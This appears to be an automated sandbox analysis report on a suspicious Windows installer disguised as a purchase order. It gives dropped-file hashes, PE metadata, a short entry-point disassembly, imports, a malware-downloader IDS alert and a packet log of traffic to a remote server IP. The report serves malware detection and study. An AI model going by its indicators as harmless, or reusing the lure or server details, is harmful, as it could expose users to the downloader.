                                              SSDEEP:1536:8DeRh0t0aKxU6MwkA+F4+YxkQJffONLMyOMdR+znkFoWc1P:C69xfth0Q
                                              MD5:547559994604F940A9B620E2F77CE622
                                              SHA1:A88A27BAE97A5282AF86FF6E3D9F9EA141ED489E
                                              SHA-256:2F5A92758B28AA496A7C0209549FF33A2C09F94DFAD8F48CF615CB1ABE7EEA45
                                              SHA-512:9A84CC3905FA12A44B17D4AEC87EB5945A0DC0E7553A8FDDE0B9E43606DC461C33C94AAC371B5FC3FD17AF04FE542E42C3BDDE048C33ADAB2E9B41D157DC4CA8
                                              Malicious:false
                                              Reputation:low
                                              Preview:000000004A4A4A0000E40000000000D4D4D4D4D40000B20000000000B2004E002900B30000343434343434002C2C2C007100360000000000007E00313131310000007E7E7E00717100000000000000000000000000005900B8B80041000900EA0000BCBCBC00D9D9D90000BCBCBC00130000002727270000D7D700004E0000008D00750000AFAF002121000F0000C400E0E0E0003B0000001E0082005A000000FF000000002020001D1D000000006D00050500000000290000A9008300003600BFBF006900170000101000A3000079002700006A6A00DEDEDE00DC000C00C000004C4C4C4C00A80000D10000FCFC0000000057006E6E6E6E00E4001919009300AA0000FCFCFC009D9D9D000061616161007F7F003A3A3A005B000000B3B300C8C8C800A100F9001515006262000084003C00B400000000F80000E3E3002A00000E00009696960000000000DEDE00999900000018000000F9F9F9F9F90010000082828200009400D7D7D7D7D7D7D7002A0022220044444444000600000000000086868600003B3B3B0000C0C000000C0016000000444400C2000F0F00A40000000085000000000000390000555555000F0000000000007B7B7B7B7B7B7B0000007676000000B3000000004400717100090900878700020200FEFE00004A0000000061000000BA009300AD00A200C1000000000000
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):3072070
                                              Entropy (8bit):0.1574149435101028
                                              Encrypted:false
                                              SSDEEP:768:GYkPCXTz5BZxw9NxlQnAyZSMNwxpqOKNcB5YdPpxk7r6s5WQxNUUlkwrvUcM0gg6:Ln/
                                              MD5:1A32E4C0027DC7FF10A50CA03C8A1DF9
                                              SHA1:D4C66E381A195EF0E71110645E35C02FA642614D
                                              SHA-256:323EDBC20508A0DB8FDB408E29A45ED0606E5366791CDA820E0ECD4C1A62B37E
                                              SHA-512:94D2B7A01C557AE2C079785DC8756BDFA5F4EDD4AADFA389D1D8877F94BC122B58AC13731B286FF262C7CA68FEEA5552E99AB5FCB414493FE3C1CB739F89B1BE
                                              Malicious:false
                                              Reputation:low
                                              Preview:......................................................................................................................................................................................L...............................................................................................................................................n..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F..............................................................................................................................^...................................................................
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6157882
                                              Entropy (8bit):0.15896061425174612
                                              Encrypted:false
                                              SSDEEP:768:g7/K3a5vYm6xqf8FLfJI80SEtK8ccB6X76bD8kNTM5N1LshHe0X9Jk4BzFIpyTVI:w5wodUqLAH6
                                              MD5:45CD3902AC3254547F0E44C9A016B31B
                                              SHA1:4B9F8CDFD0A8FADE68C4C8EF6D6A1726A601A750
                                              SHA-256:FF0227B020CC3CC727C369F4E938722DC16E797EB2669C764DE823FC46992664
                                              SHA-512:8935B6547F93FAB6F5E4CA6A258B96AECD86E2785F8DACBAD1CB6C1A641289535A6593D5E0196A56E4E4E662B20279D369F3CA39D1571147A2A92EDD8C1E9DE3
                                              Malicious:false
                                              Reputation:low
                                              Preview:...................................................................................................t...............................................................................................................................................................................................................................................................................................................................................................KJ...................................................................Q...........................................................................................................................................z............................................Q..................................................................................................................................................\..........................................................q........................................................................................
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):345
                                              Entropy (8bit):4.294234517489459
                                              Encrypted:false
                                              SSDEEP:6:KGljJoxWTCrK0XuLmqarK5pCAyQvLoZ2kMXATrQvkt+fC3ba2AF/PXkSLAJRn:dlj+WTzJm1rKnCAyQvk2kWATrT5a2nNL
                                              MD5:231F388B44C110D6FDD16605BBE17E52
                                              SHA1:D2BEE1AAE2A003FD72A46FFDEDE1B5AB0BF89D86
                                              SHA-256:325DC82DFE4B64A6FE20E3824BBFE752C0156A6E4239A45AEA7BBC4F1751560D
                                              SHA-512:5AE947D4694D5824D4BB9F64FC5F747660C7C6993CD1B4D86D41587FD0A92BB65657C0F4855010F2E6F4BF7F1689BB2C95EC32D29FC78D2664F52ABB5ACE9081
                                              Malicious:false
                                              Preview:inchoant gowdnie medejernes inswarming salt svenaage aleksandrines forehearth..frdselslovs reformations flnseknivene.accentuationernes sudansk farfdrene nathold cryptological beskftige svrenes.naturata junket hjemfalde torskens.revelled puffed buffistens.muscularizes wankel autorhythmic liturgierne tuilles totalitarianisms asaron temperately..
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):297180
                                              Entropy (8bit):7.566909397733076
                                              Encrypted:false
                                              SSDEEP:6144:P/Y7fQfN8/F0EYfqw0OfWKu4myakjWF94pmAE9zk:PgwNqo8VYJjWFPAK4
                                              MD5:C806F8FCA8273EBB885B9BDAA9DADE90
                                              SHA1:B03650911D10D0FDA8E577CD15B5A3EFADD8233A
                                              SHA-256:35D5EAC09638EF49B6F69B24C32822AA52AC6E09884F78A20E240F459D04C9CC
                                              SHA-512:123F661DB94B9DB4CF6C714190BBCE02CFEDC4F40B4811934E5219C9B04A067A0F66B8651EDA4F7C72F7F9BD91FA3F98BC45B42961180457D1EB244C20F31874
                                              Malicious:false
                                              Preview:.....aa.....................,,.......::::::..f.++....B...K.......pp.........((.../........jj.xxx........................c.--...........w......lll.(((.<.........................9...c.....~........k.................uuuuuuu..CC.....qq....8.........kkk.................I...........................g.PPP............N.......66....$.....c.........hhh....^.......yy.............................=====.................................O.............X....y....tt.....5............g.............44.........................}.........YYY..>>..........h.@@.ddd.....ooooo.........4."........................$.........X..................K...R.y.........................@............&&&................J.............................#..ii.......aa...........a.<..b..XXXXXXX....................................%..-......#..................\\...A..SSS....a..............jj..2./...............L...$$$...................\\.......|..............................H..j.......00.......................T......k....9........[[[[.#.
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1264154
                                              Entropy (8bit):0.15737251343733819
                                              Encrypted:false
                                              SSDEEP:768:Kz/OAFYCddplBJdxt7g7a6CgpChVGVUOgCwE6o5p5/wrS1jY:YTS
                                              MD5:5F2597B55457B6EA842E218E8D3B098D
                                              SHA1:0795BC493C7B065EF549AA73C4FE9E3384566E7A
                                              SHA-256:6E30C08BC1D4AD6E942130B8F9EFA770DC1812938298114ACC187DD436DB6006
                                              SHA-512:1DBE04D8CDD6E4881EFB1FA0619728E983EC3E14445D8A9E70796DFB55DA950C255CA30856F6D8B3BF79EC71B9284C07ECD7CD1662E5C9ED2C51B947C4A79FA0
                                              Malicious:false
                                              Preview:...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-........................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1785286
                                              Entropy (8bit):0.157818699705013
                                              Encrypted:false
                                              SSDEEP:768:igjhkFxRk4Cg3EFcNweXS+wUya8d0Dclmrwtx9Rh0hruNz5S2L8HeM+MQ4Ee4EsK:gT
                                              MD5:E75D60F1347F2887587045D4F6673154
                                              SHA1:56930A609A1C67A591A557F7610ACFFCD89AB025
                                              SHA-256:CEDE7492DB5C81B0B046258187557EE9B2C6E791021631FF635409395ED6054A
                                              SHA-512:76060B17EB25286EE47558B72A5C034EF2D0D5EDBE8205F57628740900CB39F81953EC5A5C917CE84FD7ED5FDA6F03AC9C819B598D58B9D2AF12CFB3F5385830
                                              Malicious:false
                                              Preview:...........................................................................................g......................................................................................................................U......................................................................................................................................................................................................................................................................................................................2..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.952645372285464
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:PO 0309494059506060609696007.exe
                                              File size:810'408 bytes
                                              MD5:0be2d87edbe429042bf5eb8791a40bfd
                                              SHA1:56d20ae6ba8bcbf137164efe5ebb846b5dabfb3e
                                              SHA256:447a4c0228f0f8c81f9159366e8cdda2af4a5603249f8bf6ceb6fe0d40f32b9a
                                              SHA512:1ec02570405763f1369131cb9405f90cc8ce27f771917462c6331e584e35ba93f2c9bbf0eeeddee5f679bd978525a0dda9d9fa5ecb4ca71f1ac2dc1d43d6c005
                                              SSDEEP:24576:Gvdzpz6Jwl+mHDoR94vmsgnqVNO7qg+E5cnF:kMwQmoRkYn6NAqDE5cnF
                                              TLSH:80052302B38D5243E971D27469224BB59FBC7D5838684B0377A83A0C7E3B356AD1FD62
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........
                                              Icon Hash:ec92131fb7aba8f4
                                              Entrypoint:0x40338f
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:b34f154ec913d2d2c435cbd644e91687
                                              Signature Valid:false
                                              Signature Issuer:CN=Unlimitableness, E=Forpremierer@Raastoftilfrsele.Dra, O=Unlimitableness, L=Singer, OU="Xcl Decayed Stykkerne ", S=Louisiana, C=US
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 13/07/2024 01:29:57 13/07/2025 01:29:57
                                              Subject Chain
                                              • CN=Unlimitableness, E=Forpremierer@Raastoftilfrsele.Dra, O=Unlimitableness, L=Singer, OU="Xcl Decayed Stykkerne ", S=Louisiana, C=US
                                              Version:3
                                              Thumbprint MD5:3E362D04FCB3222E9760E41D19853C86
                                              Thumbprint SHA-1:581045A2F76450A95157425B0D26D9F38845E01D
                                              Thumbprint SHA-256:B1F8915EF64E3A009BE0DB9729A7A697D37BEAA4436A8EC77E09BAB3E8369E60
                                              Serial:741FA8AE4858C7F138070A71A541E67BE284EF1A
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+14h], ebx
                                              mov dword ptr [esp+10h], 0040A2E0h
                                              mov dword ptr [esp+1Ch], ebx
                                              call dword ptr [004080A8h]
                                              call dword ptr [004080A4h]
                                              and eax, BFFFFFFFh
                                              cmp ax, 00000006h
                                              mov dword ptr [00434EECh], eax
                                              je 00007FCA9CBCEA63h
                                              push ebx
                                              call 00007FCA9CBD1D15h
                                              cmp eax, ebx
                                              je 00007FCA9CBCEA59h
                                              push 00000C00h
                                              call eax
                                              mov esi, 004082B0h
                                              push esi
                                              call 00007FCA9CBD1C8Fh
                                              push esi
                                              call dword ptr [00408150h]
                                              lea esi, dword ptr [esi+eax+01h]
                                              cmp byte ptr [esi], 00000000h
                                              jne 00007FCA9CBCEA3Ch
                                              push 0000000Ah
                                              call 00007FCA9CBD1CE8h
                                              push 00000008h
                                              call 00007FCA9CBD1CE1h
                                              push 00000006h
                                              mov dword ptr [00434EE4h], eax
                                              call 00007FCA9CBD1CD5h
                                              cmp eax, ebx
                                              je 00007FCA9CBCEA61h
                                              push 0000001Eh
                                              call eax
                                              test eax, eax
                                              je 00007FCA9CBCEA59h
                                              or byte ptr [00434EEFh], 00000040h
                                              push ebp
                                              call dword ptr [00408044h]
                                              push ebx
                                              call dword ptr [004082A0h]
                                              mov dword ptr [00434FB8h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebx
                                              push 0042B208h
                                              call dword ptr [00408188h]
                                              push 0040A2C8h
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x730000x7620.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xc4f080xea0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x66270x680037029c3103747b9cc70c8ecd944a9b83False0.6643629807692307data6.451784672975888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x14a20x1600eecac1fed9cc6b447d50940d178404d8False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x2aff80x600939516377e7577b622eb1ffdc4b5db4aFalse0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x350000x3e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x730000x76200x7800fa3a7dc11d759e32654dca4a134433eaFalse0.511328125data5.487917299032731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x733880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4786307053941909
                                              RT_ICON0x759300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5318949343339587
                                              RT_ICON0x769d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.5804904051172708
                                              RT_ICON0x778800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5766393442622951
                                              RT_ICON0x782080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7026173285198556
                                              RT_ICON0x78ab00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.8035714285714286
                                              RT_ICON0x791780x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.6286127167630058
                                              RT_ICON0x796e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6037234042553191
                                              RT_DIALOG0x79b480xb8dataEnglishUnited States0.6467391304347826
                                              RT_DIALOG0x79c000x144dataEnglishUnited States0.5216049382716049
                                              RT_DIALOG0x79d480x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0x79e480x11cdataEnglishUnited States0.6091549295774648
                                              RT_DIALOG0x79f680x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x79fc80x76dataEnglishUnited States0.6440677966101694
                                              RT_VERSION0x7a0400x34cdataEnglishUnited States0.4703791469194313
                                              RT_MANIFEST0x7a3900x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5640243902439024
                                              DLLImport
                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-18T11:07:28.264137+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44975284.38.133.4880TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 18, 2024 11:07:26.913634062 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:27.033320904 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:27.033730030 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:27.033941984 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:27.153631926 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.264004946 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.264082909 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.264137030 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.264137030 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.264166117 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.264174938 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.264190912 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.264209986 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.264223099 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.264260054 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.340922117 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.340960979 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.340986013 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.341006994 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.341070890 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.341092110 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.341108084 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.341136932 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.341178894 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.383932114 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.383965969 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.384062052 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.384151936 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.388050079 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.388130903 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.456118107 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.456142902 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.456228018 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.458503008 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.458590031 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.458607912 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.458679914 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.467503071 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.467545033 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.467586040 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.467628956 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.475303888 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.475385904 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.475395918 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.475447893 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.483726978 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.483822107 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.483860970 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.483916044 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.492058039 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.492137909 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.532258034 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.532341003 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.532361984 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.532418013 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.536155939 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.536221027 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.536226034 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.536283970 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.543915987 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.543989897 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.544059992 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.544122934 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.551532030 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.551601887 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.551657915 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.551717043 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.559052944 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.559123993 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.559159040 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.559176922 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.566725016 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.566795111 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.566873074 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.566951990 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.576004982 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.576105118 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.647227049 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.647291899 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.647341013 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.650059938 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.650420904 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.650485992 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.650567055 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.650635004 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.655958891 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.656033039 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.656112909 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.656183958 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.664120913 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.664177895 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.664206028 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.664242029 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.669117928 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.669229984 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.669230938 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.669311047 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.674047947 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.674151897 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.674180031 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.674248934 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.680382013 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.680453062 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.680489063 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.680561066 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.686557055 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.686670065 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.686734915 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.686832905 CET4975280192.168.2.484.38.133.48
                                              Dec 18, 2024 11:07:28.692635059 CET804975284.38.133.48192.168.2.4
                                              Dec 18, 2024 11:07:28.692718983 CET4975280192.168.2.484.38.133.48
